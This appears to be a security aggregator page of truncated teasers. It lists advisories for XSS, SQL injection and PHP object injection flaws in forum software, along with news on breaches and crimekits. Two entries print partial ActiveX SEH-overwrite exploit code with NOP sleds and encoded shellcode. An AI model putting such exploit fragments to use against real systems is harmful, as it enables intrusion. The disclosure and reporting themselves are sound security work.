Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/20004/info Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. This could allow an attacker to steal cookie-based authentication credentials and...

Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/27162/info Snitz Forums 2000 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in t...

PHPNuke 5.x/6.x Web_Links Module Remote SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7558/info It has been reported that multiple input validation bugs exist in the WebLinks module used by PHPNuke. Because of this, a remote user may be able to access the database and potentially gain access to sensitive...

Phorum 3.3.2 Cross Site Scripting Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/4767/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. The 'header.php' and 'footer.php' components of Phorum do not santize the client-supplied...

Vanilla Forums 2.0.18.4 Tagging Stored XSS

No description provided by source. Title: Vanilla Tagging Stored XSS Date: 1/6/12 Author: Henry Hoggard Author URL: henryhoggard.co.uk Author Twitter: @henryhoggard Software: Vanilla Version 2.0.18.4 http://vanillaforums.org/download Create a new thread and post your XSS as tag. I used...

AoA MP4 Converter ActiveX

Exploit for windows platform in category local exploits Exploit Title: AoA MP4 Converter ActiveX Date: 19.05.2014 Author:metacom Website: www.rstforums.com Software Link: www.aoamedia.com/AoAMP4Converter.exe Version: 4.1.2 Tested on: Windows xp sp3EN IE 6.0 nse="\xEB\x06\x90\x90";...

AoA Audio Extractor Basic 2.3.7 - ActiveX

nse="\xEB\x06\xff\xff"; seh="\x58\xE4\x04\x10"; nops="\x90"; while nops.length10 nops+="\x90"; shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+...

AoA DVD Creator 2.6.2 - ActiveX

nseh="\xEB\x06\x90\x90"; seh="\x1f\x5c\x03\x10"; nops="\x90"; while nops.length10 nops+="\x90"; shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+...

Why Full Disclosure Still Matters

When the venerable Full Disclosure security mailing list shut down abruptly last month, many in the security community were surprised. But a lot of people, even those who had been members of the list for a long time, greeted the news with a shrug. Twitter, blogs and other outlets had obviated the...

[Dumb0] A simple tool to dump users in popular forums and CMS

A simple tool to dump users forums popular forums and CMS like: WordPress SMF vBulletin IP Board XEN forums myBB useBB vanilla bbPress etc... Download Dumb0...

Learn How DuckDuckGo Search Engine helps you to be a Good Programmer

So you want to be a Programmer? Want to learn - How to code, Debug, and Program? The Web is full of free resources that can turn you into a programmer in no time, but never knew Where to start or How to troubleshoot your programs. Learning How to be a good programmer begins with learning logic...

List of 8,000 FTP Credentials for Sale in Underground Forums

Hackers are targeting FTP upload sites with the hopes of redirecting victims to spam or even infecting webservers that rely on FTP applications for updates. Hold Security reported yesterday it had secured a list of credentials for close to 7,800 FTP sites being circulated in cybercrime forums. Th...

OpenSUSE Forums Hacked, User Email Addresses Compromised

The forums for the Linux-based operating system openSUSE remain down today and for the foreseeable future following a hack earlier this week that appears to have compromised some of its users’ email addresses. OpenSUSE claims the hacker was able to exploit a vulnerability in the forum’s software,...

Atrax Kit Boasts Tor Connectivity, Bitcoin Extraction

Yet another commercial crimekit has been spotted making the rounds on the underground malware forums that uses the anonymity network Tor to stealthily communicate with its command and control servers. While it isn’t the first of its kind to use Tor, the kit, nicknamed Atrax, is cheap and comes wi...

MacRumors Forums Hacked, Passwords Stolen

The hacker behind the MacRumors Forums breach said the attack was “friendly” and that none of the data accessed will be leaked. Editorial Director Arnold Kim confirmed to Threatpost that a post on the forums from the hacker is legitimate. Kim posted an advisory on the forum on Monday informing...

millions stolen in Bitcoin heist

More trouble for Bitcoin this week after an Australian wallet service admitted that attackers broke into their systems and made off with more than $1.2 million worth of the the digital crypto-currency. The theft comes on the coat-tails of a contentious research paper claiming that a...

Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection

------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize them & save them if necessary 327. $Messages = GdnFormat::Unserialize$Messages;...

Vanilla Forums 2.0 2.0.18.5 - class.utilitycontroller.php PHP Object Injection

Vanilla Forums 2.0 2.0.18.5 - class.utilitycontroller.php PHP Object Injection ------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize...

Vanilla Forums 2.0 - 2.0.18.5 PHP Object Injection Vulnerability

Exploit for php platform in category web applications ------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize them & save them if...

[KIS-2013-09] Vanilla Forums <= 2.0.18.5 (class.utilitycontroller.php) PHP Object Injection Vulnerability

------------------------------------------------------------------------------------------- Vanilla Forums = 2.0.18.5 class.utilitycontroller.php PHP Object Injection Vulnerability ------------------------------------------------------------------------------------------- - Software Link:...